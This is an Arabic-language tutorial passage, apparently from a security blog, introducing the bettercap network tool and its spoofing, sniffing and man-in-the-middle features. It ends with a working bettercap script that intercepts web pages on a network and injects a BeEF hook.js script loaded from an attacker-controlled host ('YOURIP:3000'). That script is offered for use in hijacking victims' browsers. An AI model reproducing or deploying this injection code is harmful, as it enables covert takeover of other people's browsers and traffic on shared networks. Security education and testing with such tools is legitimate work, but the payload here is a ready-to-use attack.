في
هذا الدرس سوف اقوم بعمل شرح اداة bettercap
وهي
أداة مبرمجة بلغة Go,
تقدم
هذه الاداة حل شامل لاستخدامات الـ
spoofing
و
الـ sniffing
تم
تطوير بعض الامور من قبل الـ red
team واضافة
ميزات عديدة وسوف نتكلم في هذا الدرس عن
ميزة فيها.
مميزات
الأداة:
-
يمكنك
عمل هجوم على شبكات WIFI
-
اجهزة
الـ Bluetooth
يمكنك
عمل enumeration
و
القراءة والكتابة.
-
يمكن
تنفيذ هجمات ARP,
DNS و
DHCPv6
وتدعم
هجمات الـ MITM
-
تدعم
الـ https
والمزيد.
لكن
في هذا الدرس سوف اقوم بعمل شرح سريع عن
الأداة وفي تكملة القسم سوف استخدم الاداة
في عمليات آخرى,
لكن
سوف أعطيكم شيء جميل في هذا الدرس ألا وهو
عمل هجمة للمتصفحات واستخدام اداة
beef-xss.
لمشاهدة
هذا الدرس من هنا.
الكود
المستخدم في الشرح:
|
function
onLoad(){ console.log("BeefInject loaded."); console.log("targets: " ); } function onResponse(req, res){ if(res.ContentType.indexOf('text/html') == 0 ) { var body = res.ReadBody(); if(body.indexOf('</head>') != -1 ) { res.Body = body.replace( '</head>', '<script type="text/javascript" src="http://YOURIP:3000/hook.js"></script></head>' ); } } } |